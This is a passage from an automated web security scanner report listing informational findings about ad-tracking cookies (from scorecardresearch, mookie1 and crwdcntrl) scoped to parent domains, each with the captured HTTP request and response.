Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:43:27 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3005403&d.c=gif&d.o=nytbglobe&d.x=138794305&d.t=page&d.u=http%3A%2F%2Fboston.com%2F&d.r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:43:27 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:43:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.31. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/minorcat/1/11408426983@x02

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE; expires=Fri, 19-Jul-13 18:36:05 GMT; path=/; domain=.mookie1.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/ticketmaster/minorcat/1/11408426983@x02? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE; expires=Fri, 19-Jul-13 18:36:05 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 9
Content-Type: text/html

13.32. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=520\|rand=478684930\|pv=y\|rt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

aud=ABR4nCXPPwsBcRjA8UeKS%2B6cv6dsdC%2BA8g5kMJyVjbeAxXaTBbtsbvQCDBKy2CwmszIppUxSrud7y6fn%2BT3%2FTkTEc59DkUi1UQm%2BUhexy774YX6uJK9KZkJ0U1JjJd8n%2BhH1lKyhWF0lvVQKd8WoKYmFkrvQ3qTkTUOcYSeSA9a%2BSG4o%2BShmlOQWdnDgXI%2F2KZUl3lYQMNPiFi4rOKIfi2Im%2F5BXnL1inxn94IgO0RBGVLpU8mbW2TfjbU3fUSm22N4O%2BQPE21a7; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
cc=ACN4nGNQSDE0TLUwNUlNMzJMsTRJNDE1TDUzTzZLszQ3sEwyMTRlAAI%2F1TfF%2F3U2JzEwMBq6KC%2F6DRJjYPffVcTIwMTBwPCfESgBRP67SlAFEiqq0AVq0AWy0AWmoAu0oQoweAh%2Bn83CwHC2geE%2FSEByb%2FF%2FoHMYLYB8RiD%2FC0Q8rSqAsCLvL3EgRRBJBkmIILoiwe9TCZsk8%2F8IYZOi334nrEhrjyphRTL%2FTxNWFHamgLDDBb%2B3EVaktUeBsHWBKjGEFcmaXeSAKgIKKgFpoCRjAVSRJESccRKEj64ZkgwYmYAaGRgl5fTLCdsXwLsPt30we%2BD2YrcPpNH7SwkxUSdDRDAtYqaKixT2NxPjIlHCirjqG6gVJ27W5wjbp7C%2FnbAi%2F%2Fy9hBV5f0knrEjOcAthRcJqlsRYl0%2BMSabEKDImrCiBIZCwoqBqJuT8iysw1xHO5AkMAYStk1ppREQEb%2BAnrMjNehExJeYaYpLKbWKsW01YUTzLbsKKEi3PEQ5M%2BRl8hBX5558kpliVIsbhewgrSr0vS9hNXi%2BuE05PXK2TqFViBKooE3a514s7hB0l838%2FMaGpTYx1twlb5%2FXiFmFFygIORGSX9f%2BJSeTPiPGdAWFFaWpEtIzcrOcTNomv4i21koF%2F%2FgvC9iWdPEVMkZFKWJFiKhGpLj42mrAi7dMqRJQGmRbEWBdBjKJ4woqS%2FYgoDQA8OiC4; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=520|rand=478684930|pv=y|rt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAID=d11e854ef21d94a451e67c6f9709b415; OACECAP=4150.2; OACAP=13607.1_13606.1; _OACAP[13606]=1; OAAECAP=13607.2; _OAAECAP[13607]=1; _OAAEBLOCK[13607]=1297260544; _OACEBLOCK[4150]=1297260544; _OACECAP[4150]=1; aud=ABR4nC2SSyhEYRiGf2FmmuZy5phzjtiJPcqalQUaSbluKBZ2bhmzGxsWLhsbYeGSkrKTcomowaRsTMpaWE4piSjjfcziPL3%2F%2F37v9%2F1fY4wxCbdzxJiiOn9DLmaSxlhV5u%2FntgqRD1SbYNUIoXvuvrhr4vBRCOeE4D6WV8Fr53BHcAZR20L0h8MBoSyQNunC3bpUnLbBFVJGafRJ2yGQEmJ%2B1dm1WPJS7jgjfeOk3J0SSitwLmOZE%2ByE6iwsVpK2IdQYszyR4uGclvKFcTaSMqy76BJ1%2F6tLANZqT6C6UZOUs12rh%2Bg%2BVD%2FreRfMIgWzdEgJzjOWF5BnIew60itLbJWFMHygXojfCdFmMjco6EKdE33Fa9%2BIzlD3gLpk5cc4bzjMUp7l7pa2aVJmsBwyfDVz8jDnSAgXo8i0M0SfAkZy53FW4twEW7oLRVC79FtjZyykvIPX%2BnimgyphydeCd8bwLNI7IeWAfg1EL6iRt0dmixDk7x27KHx%2BAe2OYQY%3D; cc=ACN4nK2UTyiDYRzHn3cUKextUdPYMA4ceNm7eeO8wyY2yoUYtknJHBRRLMJBOSh%2Fym25yJKDOBgrufgbUgrluovb2o6v9zWkRd%2FfYe%2FleZ%2Ff%2B3m%2B3%2B%2F7%2FGMmryD4mkSLz98geCVLv0UUfFbboNUv2eqlAYsgMuVpK%2B4clltaRxjjhBzxkVdrTKdNHGczdsOYrHb1qZZrWtmWOeUlrrRqP8gOtYkoFYyQwLA2cUhVPKKBfPkozZo3C0RF%2FRoV3KCC69S%2FfqSBusJlquIdFXyggpc00Dg6R1U8o4GeyRnaWnsmZ2kgs%2FHJLRVVS1wayn2hHPNPuTDkjPf%2BNk0V0yE%2BuYaVDPI5Vup%2BT2KoJlKFIYN8haGu6zEcnE8uYqgmYsJ2pdb73C9IKVYorfKRGwt%2Btillpb%2Ba6qcP1uR%2B1jXqQE7vNvdgv7K6CQy58k%2F%2FD%2FUd5ifc36HUgc74OGXpDBhyh7IyksgUnackKsJQ3mwwUwtnb77Ffu2BEwyZoksYcsaHCPtEOMCQrlqi2AUoSiIFasSQh7kx1DGt%2BX1%2B%2F5vxPXzIPcyF7Up2Gghrt19IuQzDGLI3hyj76YWitIuhvuxjDPVLt3gyjZsFGGoPXFAyRQiXirkEQ763UpzJEXvC%2BylvYTVzV30lTu6IveJQBjlKmahait0LtnPEnjH0AUX9WyY%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:30 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: image/gif
Set-Cookie: aud=ABR4nCXPPwsBcRjA8UeKS%2B6cv6dsdC%2BA8g5kMJyVjbeAxXaTBbtsbvQCDBKy2CwmszIppUxSrud7y6fn%2BT3%2FTkTEc59DkUi1UQm%2BUhexy774YX6uJK9KZkJ0U1JjJd8n%2BhH1lKyhWF0lvVQKd8WoKYmFkrvQ3qTkTUOcYSeSA9a%2BSG4o%2BShmlOQWdnDgXI%2F2KZUl3lYQMNPiFi4rOKIfi2Im%2F5BXnL1inxn94IgO0RBGVLpU8mbW2TfjbU3fUSm22N4O%2BQPE21a7; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSDE0TLUwNUlNMzJMsTRJNDE1TDUzTzZLszQ3sEwyMTRlAAI%2F1TfF%2F3U2JzEwMBq6KC%2F6DRJjYPffVcTIwMTBwPCfESgBRP67SlAFEiqq0AVq0AWy0AWmoAu0oQoweAh%2Bn83CwHC2geE%2FSEByb%2FF%2FoHMYLYB8RiD%2FC0Q8rSqAsCLvL3EgRRBJBkmIILoiwe9TCZsk8%2F8IYZOi334nrEhrjyphRTL%2FTxNWFHamgLDDBb%2B3EVaktUeBsHWBKjGEFcmaXeSAKgIKKgFpoCRjAVSRJESccRKEj64ZkgwYmYAaGRgl5fTLCdsXwLsPt30we%2BD2YrcPpNH7SwkxUSdDRDAtYqaKixT2NxPjIlHCirjqG6gVJ27W5wjbp7C%2FnbAi%2F%2Fy9hBV5f0knrEjOcAthRcJqlsRYl0%2BMSabEKDImrCiBIZCwoqBqJuT8iysw1xHO5AkMAYStk1ppREQEb%2BAnrMjNehExJeYaYpLKbWKsW01YUTzLbsKKEi3PEQ5M%2BRl8hBX5558kpliVIsbhewgrSr0vS9hNXi%2BuE05PXK2TqFViBKooE3a514s7hB0l838%2FMaGpTYx1twlb5%2FXiFmFFygIORGSX9f%2BJSeTPiPGdAWFFaWpEtIzcrOcTNomv4i21koF%2F%2FgvC9iWdPEVMkZFKWJFiKhGpLj42mrAi7dMqRJQGmRbEWBdBjKJ4woqS%2FYgoDQA8OiC4; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 49
Connection: close

GIF89a...................!.......,...........T..;

13.33. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

aud=ABR4nGNgYGDwU32xl4GB0dBFVGUdgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfXx%2FoE44j2YJ1YE5rFKgSnBrxCVOyHamSG8XRCX7YFo6IQI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjTFMJbBfHYAbCghBfESf5AAgAIDzOP; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rd7%2F288kcbAwGjoIqqyDiTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIFZIqLDEJScj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8TWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2QcWPAukQSZI%2Fv8P1ARkKAWqODHDDWG0RNWstccUt2RaVQDIeggHaiKG9WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoGh6QSkAZKwk0CRz%2BaJiDNxHFxGpgPThaMwHSiBGTL6ZfjdmkA7z5q2eP9pQRfcMnglgxcxEwtR2jtkcBtj8L%2BZnwuFCUcLVz1DdRyqZv1OeRcCLMXnBtBZivsb8ftWP%2F8vXg1u1mfxa3Z%2B0s6Psk03JJyhltwSwqrWeJ1k7AanpLD%2B0s%2BXs05J2cCA9IUmFGBXMXk74SjKqiaCVceZACG3zrC%2BT9MOANfWnqDR3IDP2EHulkvxG2Cm%2FUi3JKhPTPx6VyNWzJMuBJfojpKjKu34zPhMG7JeJbd%2BBxWgFsy0fIc4WpFfgYfMUW6FN5kFs%2Byh4jKQ7WSsKLU%2B7KE3axwCU94eb24jmwCNmsYGLhaJ1GrQApUUcJTRKso45ZUXFZHOEBk%2Fu8nrChQRRtv%2FHi9uIE7U3u9uIVbUlnAAV%2B6fYYnM6%2F%2FT4zDDfA0i9SIaBYp7L%2BG2wS%2BirfUimb%2F%2FBd4YnLWTcJ%2BBQAr6yeC; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwk2bdw8DAaCjZl8nFoMPAIKDUwNAAFO8FUzyXwZTgVzDFywymRHdBqD0QJTchvP1gSqwbolIaTPFXQuQWQnhVEA18YIrrMUSDOAMIiCZClPyFaEiAOOI9mGLjhaiEaOAwgmifAab4RMGUyDkwJb4PTAkcB1NCzyBmukH8EAERLIYY9gli0SGIYAnEZRD7xIoghqlCvGIK4a2CmHIATEl4QRzhD6QAq%2BdH4Q%3D%3D; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FadY9%2F%2FesTmdgYDSU7MvkAokxcPjvKmJkYOJgYPjPCJRgYDD331WCKiDwbTeKgGlCRRWqioSKGnSBLHSBKegCbagCDCGC32czMzAoPTb8zwgUOAukQRKSr7%2F%2BB6tQCjuTzQIUB%2FOB4g0MIHlGCyANUv8Fwg9UcWKGK2K0RJXU2mOKWzKtKgBkPIQDtRbD%2BLAzFbhNkPl%2FBJ%2FkaWJcH43bhLAzBTAHMuB0oP%2BuAsLWaO1RwG2N4Pc2Zrg16JKBKjGEjZc1u8gOUvQNHJJKQBooCTdJEiKO0NTTCqIhaQEkoCSnX47beQG8%2Bygy3PtLCb4EIoNbMnARM0U2a%2B2RwG24wv5mfM4SJRzqXPUNFDnPzfoccvaDWQbOhiB5%2F%2Fy9eOUV9rfj9oGb9Vnckt5f0vFJpuGWlDPcgltSWM0Sr4O9v%2BTjlRdWw1NaBFUzYcslwFAF8hWTvxOOL%2F%2F8dYSzs8L%2BN3gKBOEMPAlqAz9hN7hZL8QXZ4twS4b2zMSnczU%2BV1filvTPP0qMq7fjM%2BEwbsl4lt34HFaAWzLR8hzh2kF%2BBh%2FhKA1UkcKb7OJZ9hAOgjDVSsKKUu%2FLEnazwiU84eX14jqyCejWQFI7V%2BskigqeQBUlPIWuijJuScVldYRDQeb%2FfmIqXm28keL14gbu7O714hZuSWUBB3yJ9RmeHLz%2BPzEON8DTpFEjokmjsP8abhP4Kt5SFLf%2B%2BS%2FwRN%2Bsm4Q9mHTyFGFF0W9T8ViTqkzYhPhYPC0v7dMqhPO1fKYF%2Fvrx%2F048BVNsPJ6E8H8rbkkA0QuBNw%3D%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:41 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU32xl4GB0dBFVGUdgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfXx%2FoE44j2YJ1YE5rFKgSnBrxCVOyHamSG8XRCX7YFo6IQI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjTFMJbBfHYAbCghBfESf5AAgAIDzOP; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rd7%2F288kcbAwGjoIqqyDiTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIFZIqLDEJScj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8TWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2QcWPAukQSZI%2Fv8P1ARkKAWqODHDDWG0RNWstccUt2RaVQDIeggHaiKG9WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoGh6QSkAZKwk0CRz%2BaJiDNxHFxGpgPThaMwHSiBGTL6ZfjdmkA7z5q2eP9pQRfcMnglgxcxEwtR2jtkcBtj8L%2BZnwuFCUcLVz1DdRyqZv1OeRcCLMXnBtBZivsb8ftWP%2F8vXg1u1mfxa3Z%2B0s6Psk03JJyhltwSwqrWeJ1k7AanpLD%2B0s%2BXs05J2cCA9IUmFGBXMXk74SjKqiaCVceZACG3zrC%2BT9MOANfWnqDR3IDP2EHulkvxG2Cm%2FUi3JKhPTPx6VyNWzJMuBJfojpKjKu34zPhMG7JeJbd%2BBxWgFsy0fIc4WpFfgYfMUW6FN5kFs%2Byh4jKQ7WSsKLU%2B7KE3axwCU94eb24jmwCNmsYGLhaJ1GrQApUUcJTRKso45ZUXFZHOEBk%2Fu8nrChQRRtv%2FHi9uIE7U3u9uIVbUlnAAV%2B6fYYnM6%2F%2FT4zDDfA0i9SIaBYp7L%2BG2wS%2BirfUimb%2F%2FBd4YnLWTcJ%2BBQAr6yeC; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div> <script>
...[SNIP]...

13.34. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

aud=ABR4nGNgYGDwU33RxcDAaOgiEredwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAAfMjOe; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhK3HSTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIOZLqLDEJccj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KAAzXFWI%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU30Ry8DAaOgivDqIwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPp4%2F0Ac8R7MEysC81ilwJTgV4jKnRDtzBDeLojL9kA0dEIE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQrxpCuGtgnjsAFhQwgviJH8gAQCsIzNY; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIrw6CCTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZOqLDEJcco%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8zWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2Q8WPAukQSZAjAQylAJVnJjhhjBaomrW2mOKWzKtKgBkPYQDcyS69WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoBh6QSkAZKwk0COxhNE5Bm4rg4HcwHJwtGYDpRArLl9MtxuzSAdx%2B17PH%2BUoIvuGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHIuhNkLzo0gsxX2t%2BN2rH%2F%2BXrya3azP4tbs%2FSUdn2Qabkk5wy24JYXVLPG6SVgNT8nh%2FSUfr%2BackzOBAWkKDkAGxeTvhKMqqJoJVx5kAIbfOsL5P0w4A19aeoNHcgM%2FYQe6WS%2FEbYKb9SLckqE9M%2FHpXI1bMky4El%2BiOkqMq7fjM%2BEwbsl4lt34HFaAWzLR8hzhakV%2BBh8xRboU3mQWz7KHiMpDtZKwotT7soTdrHAJT3h5vbiObAI2axgYuFonUatAClRRwlNEqyjjllRcVkc4QGT%2B7yesKFBFG2%2F8eL24gTtTe724hVtSWcABX7p9hiczr%2F9PjMMN8DSL1IhoFinsv4bbBL6Kt9SKZv%2F8F3hictZNwn4FAEhKFMU%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:50 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU33RxcDAaOgiEredwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAAfMjOe; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
